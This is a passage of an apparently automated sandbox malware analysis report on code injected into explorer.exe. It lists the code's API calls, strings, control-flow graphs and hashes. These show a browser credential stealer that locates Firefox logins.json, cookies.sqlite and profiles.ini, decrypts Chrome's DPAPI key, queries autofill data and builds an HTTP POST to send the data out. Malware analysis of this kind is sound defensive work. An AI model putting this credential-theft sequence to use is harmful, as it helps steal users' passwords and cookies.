                                                                                                          • Part of subcall function 030F1000: GetProcessHeap.KERNEL32(00000008,?,030F11C7,?,?,00000001,00000000,?), ref: 030F1003
                                                                                                          • Part of subcall function 030F1000: RtlAllocateHeap.NTDLL(00000000), ref: 030F100A
                                                                                                        • PathCombineW.SHLWAPI(00000000,00000000,*.*,?,00000000), ref: 030F3F0A
                                                                                                        • FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 030F3F16
                                                                                                        • lstrcmpiW.KERNEL32(?,031462CC), ref: 030F3F38
                                                                                                        • lstrcmpiW.KERNEL32(?,031462D0), ref: 030F3F4C
                                                                                                        • PathCombineW.SHLWAPI(00000000,00000000,?), ref: 030F3F69
                                                                                                        • lstrcmpiW.KERNEL32(?,Local State), ref: 030F3F7E
                                                                                                        • PathCombineW.SHLWAPI(00000000,00000000,?), ref: 030F3F9B
                                                                                                        • FindNextFileW.KERNELBASE(00000000,00000010), ref: 030F3FB5
                                                                                                        • FindClose.KERNELBASE(00000000), ref: 030F3FC4
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CombineFindPathlstrcmpi$FileHeap$AllocateCloseFirstNextProcess
                                                                                                        • String ID: *.*$Local State
                                                                                                        • API String ID: 3923353463-3324723383
                                                                                                        • Opcode ID: 26ca958ab3cdfd5bdfe2d8d26e13d22cd6ae942289f3232b1e6b715495e87104
                                                                                                        • Instruction ID: aba31cc096de400a9f164d05806f18d269fa9f91398f37a456de0558ace6551a
                                                                                                        • Opcode Fuzzy Hash: 26ca958ab3cdfd5bdfe2d8d26e13d22cd6ae942289f3232b1e6b715495e87104
                                                                                                        • Instruction Fuzzy Hash: 9921F278201344BFD758FA309C08E7FB6BCDFCA66AF080569FA12C6585DBB9844C8671
                                                                                                        Function 030F2B15 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 102filestringCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                          • Part of subcall function 030F1953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,030F2F0C), ref: 030F1973
                                                                                                          • Part of subcall function 030F1953: lstrlenW.KERNEL32(03146564,?,?,030F2F0C), ref: 030F1978
                                                                                                          • Part of subcall function 030F1953: lstrcatW.KERNEL32(00000000,?,?,?,030F2F0C), ref: 030F1990
                                                                                                          • Part of subcall function 030F1953: lstrcatW.KERNEL32(00000000,03146564,?,?,030F2F0C), ref: 030F1994
                                                                                                        • FindFirstFileW.KERNELBASE(00000000,?,00000000,00000000,?,00000000), ref: 030F2B3D
                                                                                                        • lstrcmpiW.KERNEL32(?,031462CC), ref: 030F2B63
                                                                                                        • lstrcmpiW.KERNEL32(?,031462D0), ref: 030F2B7B
                                                                                                          • Part of subcall function 030F19B4: lstrlenW.KERNEL32(00000000,00000000,00000000,030F2CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 030F19C4
                                                                                                        • StrStrIW.SHLWAPI(00000000,logins.json), ref: 030F2BE7
                                                                                                        • StrStrIW.SHLWAPI(00000000,cookies.sqlite), ref: 030F2C16
                                                                                                        • FindNextFileW.KERNELBASE(00000000,00000010), ref: 030F2C43
                                                                                                        • FindClose.KERNELBASE(00000000), ref: 030F2C52
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Findlstrlen$Filelstrcatlstrcmpi$CloseFirstNext
                                                                                                        • String ID: \*.*$cookies.sqlite$logins.json
                                                                                                        • API String ID: 1108783765-3717368146
                                                                                                        • Opcode ID: 2bdcdfbb740b834599a4aec375beb7696e182549ae974e65f8f439b0ee0ac010
                                                                                                        • Instruction ID: 50c27574a629244e1d5ba0866b8b50d0b07c75a953a7d949338640d23efaa7de
                                                                                                        • Opcode Fuzzy Hash: 2bdcdfbb740b834599a4aec375beb7696e182549ae974e65f8f439b0ee0ac010
                                                                                                        • Instruction Fuzzy Hash: 0B31C43C3063059FCB18FB71984497E73DEABC9704B084D2CEA46DBA45EB79CD4682A1
                                                                                                        Function 030F1D4A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 109stringfileCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 531 30f1d4a-30f1d5c 532 30f1eb4-30f1ebe 531->532 533 30f1d62-30f1d66 531->533 533->532 534 30f1d6c-30f1d77 call 30f19b4 533->534 537 30f1d8b-30f1d97 call 30f1953 534->537 538 30f1d79-30f1d89 call 30f1953 534->538 543 30f1d9b-30f1d9d 537->543 538->543 543->532 544 30f1da3-30f1db4 FindFirstFileW 543->544 545 30f1ead-30f1eaf call 30f1011 544->545 546 30f1dba 544->546 545->532 548 30f1dbe-30f1dc3 546->548 549 30f1e3d-30f1e6a call 30f1953 call 30f199d lstrcmpiW 548->549 550 30f1dc5-30f1dd7 lstrcmpiW 548->550 561 30f1e6c-30f1e75 call 30f1cf7 549->561 562 30f1e87-30f1e89 call 30f1011 549->562 552 30f1e8e-30f1e9c FindNextFileW 550->552 553 30f1ddd-30f1def lstrcmpiW 550->553 552->548 554 30f1ea2-30f1ea9 FindClose 552->554 553->552 556 30f1df5-30f1e00 call 30f19b4 553->556 554->545 563 30f1e09 556->563 564 30f1e02-30f1e07 556->564 561->562 571 30f1e77-30f1e7f 561->571 562->552 565 30f1e0b-30f1e3b call 30f1953 call 30f199d call 30f1d4a 563->565 564->565 565->562 571->562
                                                                                                        APIs
                                                                                                          • Part of subcall function 030F19B4: lstrlenW.KERNEL32(00000000,00000000,00000000,030F2CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 030F19C4
                                                                                                        • FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 030F1DA9
                                                                                                        • lstrcmpiW.KERNEL32(?,031462CC), ref: 030F1DCF
                                                                                                        • lstrcmpiW.KERNEL32(?,031462D0), ref: 030F1DE7
                                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 030F1E62
                                                                                                          • Part of subcall function 030F1CF7: lstrlenW.KERNEL32(00000000,00000000,00000000,030F2C27), ref: 030F1D02
                                                                                                          • Part of subcall function 030F1CF7: RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 030F1D0D
                                                                                                        • FindNextFileW.KERNELBASE(00000000,00000010), ref: 030F1E94
                                                                                                        • FindClose.KERNELBASE(00000000), ref: 030F1EA3
                                                                                                          • Part of subcall function 030F1953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,030F2F0C), ref: 030F1973
                                                                                                          • Part of subcall function 030F1953: lstrlenW.KERNEL32(03146564,?,?,030F2F0C), ref: 030F1978
                                                                                                          • Part of subcall function 030F1953: lstrcatW.KERNEL32(00000000,?,?,?,030F2F0C), ref: 030F1990
                                                                                                          • Part of subcall function 030F1953: lstrcatW.KERNEL32(00000000,03146564,?,?,030F2F0C), ref: 030F1994
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: lstrlen$Findlstrcmpi$Filelstrcat$CloseComputeCrc32FirstNext
                                                                                                        • String ID: *.*$\*.*
                                                                                                        • API String ID: 232625764-1692270452
                                                                                                        • Opcode ID: 3bdf0033c535a28da0ac1e1ed998cf51938018de46afa8a913a1f79e70b4c1ee
                                                                                                        • Instruction ID: 9642967ea16f3511c2b0bba0fca6eaacd13fc69d7678aa0ea5cd1e61ac6ec3cf
                                                                                                        • Opcode Fuzzy Hash: 3bdf0033c535a28da0ac1e1ed998cf51938018de46afa8a913a1f79e70b4c1ee
                                                                                                        • Instruction Fuzzy Hash: 8E31DA34309341DFCB2CFB709888ABF76EA9FC9244F04491DE646C7644DB75C8498691
                                                                                                        Function 030F3E04 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 75encryptionCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 641 30f3e04-30f3e11 call 30f1b6a 644 30f3e17-30f3e22 call 30f1c31 641->644 645 30f3ed4-30f3ed8 641->645 644->645 648 30f3e28-30f3e34 call 30f2fb1 644->648 651 30f3e3a-30f3e4f call 30f123b 648->651 652 30f3ec8-30f3ecc 648->652 655 30f3e51-30f3e58 651->655 656 30f3ec0-30f3ec7 call 30f1011 651->656 652->645 658 30f3ebf 655->658 659 30f3e5a-30f3e6a 655->659 656->652 658->656 661 30f3e6c-30f3e7c RtlCompareMemory 659->661 662 30f3eb8-30f3eba call 30f1011 659->662 661->662 663 30f3e7e-30f3ea6 CryptUnprotectData 661->663 662->658 663->662 665 30f3ea8-30f3ead 663->665 665->662 666 30f3eaf-30f3eb3 665->666 666->662
                                                                                                        APIs
                                                                                                          • Part of subcall function 030F1B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,030F2893,00000000,00000000,00000000,?), ref: 030F1B82
                                                                                                          • Part of subcall function 030F1B6A: CloseHandle.KERNELBASE(00000000), ref: 030F1B8F
                                                                                                          • Part of subcall function 030F1C31: CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,00000000,00000000,030F3E1E,00000000,?,030F3FA8), ref: 030F1C46
                                                                                                          • Part of subcall function 030F1C31: GetFileSize.KERNEL32(00000000,00000000,00000000,?,030F3FA8), ref: 030F1C56
                                                                                                          • Part of subcall function 030F1C31: ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,030F3FA8), ref: 030F1C76
                                                                                                          • Part of subcall function 030F1C31: CloseHandle.KERNEL32(00000000,?,030F3FA8), ref: 030F1C91
                                                                                                          • Part of subcall function 030F2FB1: StrStrIA.KERNELBASE(00000000,"encrypted_key":",00000000,00000000,00000000,030F3E30,00000000,00000000,?,030F3FA8), ref: 030F2FC1
                                                                                                          • Part of subcall function 030F2FB1: lstrlen.KERNEL32("encrypted_key":",?,030F3FA8), ref: 030F2FCE
                                                                                                          • Part of subcall function 030F2FB1: StrStrIA.SHLWAPI("encrypted_key":",0314692C,?,030F3FA8), ref: 030F2FDD
                                                                                                          • Part of subcall function 030F123B: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,030F3E4B,00000000), ref: 030F124A
                                                                                                          • Part of subcall function 030F123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 030F1268
                                                                                                          • Part of subcall function 030F123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 030F1295
                                                                                                        • RtlCompareMemory.NTDLL(00000000,IDPAP,00000005), ref: 030F3E74
                                                                                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 030F3E9E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$Crypt$BinaryCloseCreateHandleStringlstrlen$CompareDataMemoryReadSizeUnprotect
                                                                                                        • String ID: $DPAP$DPAP$IDPAP
                                                                                                        • API String ID: 3076719866-957854035
                                                                                                        • Opcode ID: 855e94855c468a438f9c8edaa161125fee8f8ea86ae0a02d2d4bcac326253604
                                                                                                        • Instruction ID: 6820d4381051ecf6f2020a8f08794b0365ba8b079cb02651fb6828c340eb168f
                                                                                                        • Opcode Fuzzy Hash: 855e94855c468a438f9c8edaa161125fee8f8ea86ae0a02d2d4bcac326253604
                                                                                                        • Instruction Fuzzy Hash: 5A21F636605345AFD715EA688880BBFF2DDAFC8614F48096DEA40D7640EB74C94887A2
                                                                                                        Function 030F4B92 Relevance: 3.0, APIs: 2, Instructions: 26nativeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 030F1162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 030F116F
                                                                                                        • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 030F4BB6
                                                                                                        • NtUnmapViewOfSection.NTDLL(000000FF), ref: 030F4BBF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MemoryMoveQuerySectionUnmapViewVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 1675517319-0
                                                                                                        • Opcode ID: e3a1fc40703d0a340abc3663ea9b4f46317e157219532f77d3b0ab1b259a30e0
                                                                                                        • Instruction ID: 0835d9231c61dcbb51a1e15de4400d182bc39c24cdd38810792f342126aaf6ac
                                                                                                        • Opcode Fuzzy Hash: e3a1fc40703d0a340abc3663ea9b4f46317e157219532f77d3b0ab1b259a30e0
                                                                                                        • Instruction Fuzzy Hash: C0E0D835802310AFC75CFB31BC08F8B3B9C9FCA265F10C969A75586485CB3948408660
                                                                                                        Function 030F6512 Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetSystemInfo.KERNELBASE(031520A4,00000001,00000000,0000000A,03143127,030F28DA,00000000,?), ref: 030FBFFC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InfoSystem
                                                                                                        • String ID:
                                                                                                        • API String ID: 31276548-0
                                                                                                        • Opcode ID: 32ca2350298fc8a38d57d9493efe8802c05b3eafdaff7d18ad3fb6913fc4fbc1
                                                                                                        • Instruction ID: d3b571db4af1ebcfe598665b97a00a0cbb769ffb498b1ab3ebf43719dfc05fe4
                                                                                                        • Opcode Fuzzy Hash: 32ca2350298fc8a38d57d9493efe8802c05b3eafdaff7d18ad3fb6913fc4fbc1
                                                                                                        • Instruction Fuzzy Hash: 7BE06D36786308BEEE25F3B8AC06FAA14544BC8F11F504B25BB30BC8C9CB9780810022
                                                                                                        Function 030F3C40 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 147stringfileCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                          • Part of subcall function 030F1B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,030F2893,00000000,00000000,00000000,?), ref: 030F1B82
                                                                                                          • Part of subcall function 030F1B6A: CloseHandle.KERNELBASE(00000000), ref: 030F1B8F
                                                                                                          • Part of subcall function 030F1000: GetProcessHeap.KERNEL32(00000008,?,030F11C7,?,?,00000001,00000000,?), ref: 030F1003
                                                                                                          • Part of subcall function 030F1000: RtlAllocateHeap.NTDLL(00000000), ref: 030F100A
                                                                                                        • GetTempPathW.KERNEL32(00000104,00000000), ref: 030F3C6A
                                                                                                        • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 030F3C76
                                                                                                        • DeleteFileW.KERNELBASE(00000000), ref: 030F3C7D
                                                                                                        • CopyFileW.KERNELBASE(?,00000000,00000000), ref: 030F3C89
                                                                                                        • lstrlen.KERNEL32(00000000,?,?,?,?,00000000,00000000,?), ref: 030F3D2F
                                                                                                        • lstrlen.KERNEL32(00000000), ref: 030F3D36
                                                                                                        • wsprintfA.USER32 ref: 030F3D55
                                                                                                        • lstrlen.KERNEL32(00000000), ref: 030F3D61
                                                                                                        • lstrcat.KERNEL32(00000000,?), ref: 030F3D89
                                                                                                        • lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 030F3DB2
                                                                                                        • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 030F3DED
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$lstrlen$DeleteHeapTemp$AllocateCloseCopyCreateHandleNamePathProcesslstrcatwsprintf
                                                                                                        • String ID: %s = %s$AUTOFILL$SELECT name,value FROM autofill
                                                                                                        • API String ID: 2923052733-3488123210
                                                                                                        • Opcode ID: bcaef64b74310b8048fdb3a1ce32c7d695d04acf73e8da6199ecc887dacca42f
                                                                                                        • Instruction ID: 49abec0c276c5af93211a2c2c73bfee7f79b6625f76f25a0c2fd089bf255b269
                                                                                                        • Opcode Fuzzy Hash: bcaef64b74310b8048fdb3a1ce32c7d695d04acf73e8da6199ecc887dacca42f
                                                                                                        • Instruction Fuzzy Hash: D641B038605341AFD718FB319C80E7FBAEDAFCA654F04086CFA45AB641DB35C8058762
                                                                                                        Function 030F28F8 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 158stringfileCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 348 30f28f8-30f28fa 349 30f2ac8-30f2ada call 3143848 DeleteFileW call 30f1011 348->349 350 30f2900-30f291c call 30f1000 call 31102ec 348->350 358 30f2adf-30f2ae6 349->358 359 30f2a8f-30f2aa2 call 310fb92 lstrlen 350->359 360 30f2922-30f293a call 30f1fa7 350->360 367 30f2aa4-30f2abc call 30f1798 * 3 359->367 368 30f2ac1-30f2ac3 call 30f1011 359->368 365 30f293c-30f2942 360->365 366 30f2948-30f295f call 30f1fa7 360->366 365->366 370 30f2944 365->370 376 30f296d-30f2984 call 30f1fa7 366->376 377 30f2961-30f2967 366->377 367->368 368->349 370->366 383 30f2986-30f298c 376->383 384 30f2992-30f29a7 call 30f1fa7 376->384 377->376 379 30f2969 377->379 379->376 383->384 386 30f298e 383->386 388 30f29a9-30f29af 384->388 389 30f29b5-30f29cc call 30f1fa7 384->389 386->384 388->389 390 30f29b1 388->390 393 30f29ce-30f29d4 389->393 394 30f29da-30f29e5 lstrlen 389->394 390->389 393->394 395 30f29d6 393->395 396 30f29eb-30f29f0 lstrlen 394->396 397 30f2a79-30f2a85 call 31102ec 394->397 395->394 396->397 399 30f29f6-30f2a11 call 30f1000 396->399 397->360 402 30f2a8b 397->402 404 30f2a1b-30f2a56 call 30f2112 wsprintfA lstrlen 399->404 405 30f2a13 399->405 402->359 408 30f2a6a-30f2a74 lstrcat call 30f1011 404->408 409 30f2a58-30f2a68 call 30f102f 404->409 405->404 408->397 409->408
                                                                                                        APIs
                                                                                                        • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 030F2AD2
                                                                                                          • Part of subcall function 030F1000: GetProcessHeap.KERNEL32(00000008,?,030F11C7,?,?,00000001,00000000,?), ref: 030F1003
                                                                                                          • Part of subcall function 030F1000: RtlAllocateHeap.NTDLL(00000000), ref: 030F100A
                                                                                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?), ref: 030F29E1
                                                                                                        • lstrlen.KERNEL32(00000000), ref: 030F29EC
                                                                                                        • wsprintfA.USER32 ref: 030F2A38
                                                                                                        • lstrlen.KERNEL32(00000000), ref: 030F2A44
                                                                                                        • lstrcat.KERNEL32(00000000,00000000), ref: 030F2A6C
                                                                                                        • lstrlen.KERNEL32(00000000,?,?), ref: 030F2A99
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: lstrlen$Heap$AllocateDeleteFileProcesslstrcatwsprintf
                                                                                                        • String ID: %sTRUE%s%s%s%s%s$COOKIES$FALSE$TRUE
                                                                                                        • API String ID: 304071051-2605711689
                                                                                                        • Opcode ID: cf9eec4647e86c090521a1d0ce1ffcad5300900fa7925ab8eaae7441e5afa42f
                                                                                                        • Instruction ID: 17e3fce85d160d2b68a60df91b467a0318ab2ba6d3a37f4a3835d1152428830f
                                                                                                        • Opcode Fuzzy Hash: cf9eec4647e86c090521a1d0ce1ffcad5300900fa7925ab8eaae7441e5afa42f
                                                                                                        • Instruction Fuzzy Hash: A851E53860A3479FC729EF319850A3FB7D9AFC9204F080C2DF6859B641DB35C8458762
                                                                                                        Function 030F2CB5 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 112stringCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 484 30f2cb5-30f2cc7 call 30f1953 488 30f2ccd-30f2d06 call 30f1953 call 30f1000 * 2 call 30f1b6a 484->488 489 30f2e17-30f2e2d call 30f2ae9 484->489 500 30f2d0c-30f2d1c GetPrivateProfileSectionNamesW 488->500 501 30f2df9-30f2e12 call 30f1011 * 4 488->501 500->501 502 30f2d22-30f2d26 500->502 501->489 505 30f2d2c-30f2d32 502->505 506 30f2df5 502->506 508 30f2d36-30f2d39 505->508 506->501 510 30f2d3f-30f2d4d StrStrIW 508->510 511 30f2ded-30f2df1 508->511 513 30f2dd7-30f2de7 lstrlenW 510->513 514 30f2d53-30f2d70 GetPrivateProfileStringW 510->514 511->506 513->508 513->511 514->513 516 30f2d72-30f2d88 GetPrivateProfileIntW 514->516 518 30f2dcc-30f2dd2 call 30f2ae9 516->518 519 30f2d8a-30f2d9c call 30f1953 516->519 518->513 523 30f2d9e-30f2da2 519->523 524 30f2db4-30f2dca call 30f2ae9 call 30f1011 519->524 525 30f2dac-30f2db2 523->525 526 30f2da4-30f2daa 523->526 524->513 525->523 525->524 526->525
                                                                                                        APIs
                                                                                                          • Part of subcall function 030F1953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,030F2F0C), ref: 030F1973
                                                                                                          • Part of subcall function 030F1953: lstrlenW.KERNEL32(03146564,?,?,030F2F0C), ref: 030F1978
                                                                                                          • Part of subcall function 030F1953: lstrcatW.KERNEL32(00000000,?,?,?,030F2F0C), ref: 030F1990
                                                                                                          • Part of subcall function 030F1953: lstrcatW.KERNEL32(00000000,03146564,?,?,030F2F0C), ref: 030F1994
                                                                                                          • Part of subcall function 030F1000: GetProcessHeap.KERNEL32(00000008,?,030F11C7,?,?,00000001,00000000,?), ref: 030F1003
                                                                                                          • Part of subcall function 030F1000: RtlAllocateHeap.NTDLL(00000000), ref: 030F100A
                                                                                                          • Part of subcall function 030F1B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,030F2893,00000000,00000000,00000000,?), ref: 030F1B82
                                                                                                          • Part of subcall function 030F1B6A: CloseHandle.KERNELBASE(00000000), ref: 030F1B8F
                                                                                                        • GetPrivateProfileSectionNamesW.KERNEL32(00000000,0000FDE8,00000000), ref: 030F2D13
                                                                                                        • StrStrIW.SHLWAPI(00000000,Profile), ref: 030F2D45
                                                                                                        • GetPrivateProfileStringW.KERNEL32(00000000,Path,0314637C,?,00000FFF,?), ref: 030F2D68
                                                                                                        • GetPrivateProfileIntW.KERNEL32(00000000,IsRelative,00000001,?), ref: 030F2D7B
                                                                                                        • lstrlenW.KERNEL32(00000000), ref: 030F2DD8
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: PrivateProfilelstrlen$Heaplstrcat$AllocateCloseCreateFileHandleNamesProcessSectionString
                                                                                                        • String ID: IsRelative$Path$Profile$profiles.ini
                                                                                                        • API String ID: 2234428054-4107377610
                                                                                                        • Opcode ID: 390cef3dd6cedab0bf82f911d87026efc56d95e1442af745d4de2f30ab6062b3
                                                                                                        • Instruction ID: c48ef4d3b8687fe00b24f1a607115b53819ad17db0b3ef814a984d13081444aa
                                                                                                        • Opcode Fuzzy Hash: 390cef3dd6cedab0bf82f911d87026efc56d95e1442af745d4de2f30ab6062b3
                                                                                                        • Instruction Fuzzy Hash: E331C6387063029FC758FF31981067FB7EAAFC9704F04482DEA466BA81DF7588468752
                                                                                                        Function 030F1333 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 226COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 576 30f1333-30f1385 call 30f1000 call 30f106c call 30f12a3 583 30f1387-30f139e 576->583 584 30f13a0-30f13a3 576->584 587 30f13b0-30f13b2 583->587 586 30f13aa-30f13ac 584->586 586->587 588 30f15cb-30f15da call 30f1011 587->588 589 30f13b8-30f13ef RtlZeroMemory 587->589 593 30f13f5-30f141a 589->593 594 30f15c3-30f15ca 589->594 597 30f15bf 593->597 598 30f1420-30f1456 call 30f10b1 593->598 594->588 597->594 601 30f145d-30f1478 598->601 602 30f1458 598->602 604 30f147e-30f1483 601->604 605 30f15b5 601->605 602->601 606 30f149d-30f14c7 call 30f1000 wsprintfW 604->606 607 30f1485-30f1496 604->607 605->597 610 30f14c9-30f14cb 606->610 611 30f14e0-30f1509 606->611 607->606 612 30f14cc-30f14cf 610->612 618 30f150f-30f151b 611->618 619 30f15a5 611->619 614 30f14da-30f14dc 612->614 615 30f14d1-30f14d6 612->615 614->611 615->612 616 30f14d8 615->616 616->611 618->619 623 30f1521-30f1537 call 30f1000 618->623 621 30f15ac-30f15b0 call 30f1011 619->621 621->605 626 30f1539-30f1544 623->626 627 30f1558-30f156f 626->627 628 30f1546-30f1553 call 30f102f 626->628 632 30f1573-30f157d 627->632 633 30f1571 627->633 628->627 632->626 634 30f157f-30f1583 632->634 633->632 635 30f159a-30f15a1 call 30f1011 634->635 636 30f1585 call 30f104c 634->636 635->619 639 30f158a-30f1594 RtlMoveMemory 636->639 639->635
                                                                                                        APIs
                                                                                                          • Part of subcall function 030F1000: GetProcessHeap.KERNEL32(00000008,?,030F11C7,?,?,00000001,00000000,?), ref: 030F1003
                                                                                                          • Part of subcall function 030F1000: RtlAllocateHeap.NTDLL(00000000), ref: 030F100A
                                                                                                          • Part of subcall function 030F106C: lstrlen.KERNEL32(033F734E,00000000,00000000,00000000,030F1366,74DE8A60,033F734E,00000000), ref: 030F1074
                                                                                                          • Part of subcall function 030F106C: MultiByteToWideChar.KERNEL32(00000000,00000000,033F734E,00000001,00000000,00000000), ref: 030F1086
                                                                                                          • Part of subcall function 030F12A3: RtlZeroMemory.NTDLL(?,00000018), ref: 030F12B5
                                                                                                        • RtlZeroMemory.NTDLL(?,0000003C), ref: 030F13C2
                                                                                                        • wsprintfW.USER32 ref: 030F14B5
                                                                                                        • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 030F1594
                                                                                                        Strings
                                                                                                        • Content-Type: application/x-www-form-urlencoded, xrefs: 030F14FB
                                                                                                        • Accept: */*Referer: %S, xrefs: 030F14AF
                                                                                                        • POST, xrefs: 030F1465
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Memory$HeapZero$AllocateByteCharMoveMultiProcessWidelstrlenwsprintf
                                                                                                        • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$POST
                                                                                                        • API String ID: 3833683434-704803497
                                                                                                        • Opcode ID: 91664d73099d40168742daaf3aa9542dbf9b014a7ba731cfa0b33b76ec3571e5
                                                                                                        • Instruction ID: ddcb0be25837f8d8655ed77335b05788eb484d90b12ca0a0c94c34f63212b74a
                                                                                                        • Opcode Fuzzy Hash: 91664d73099d40168742daaf3aa9542dbf9b014a7ba731cfa0b33b76ec3571e5
                                                                                                        • Instruction Fuzzy Hash: 237189B4609341EFD758EF24D884A2BBBE9EFC9748F04092DFA95C7241DB70D9448B62
                                                                                                        Function 030FB1E5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 174fileCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
